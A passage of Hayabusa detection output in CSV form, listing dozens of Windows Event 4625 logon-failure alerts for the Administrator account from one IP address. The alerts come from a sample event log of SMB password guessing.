01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 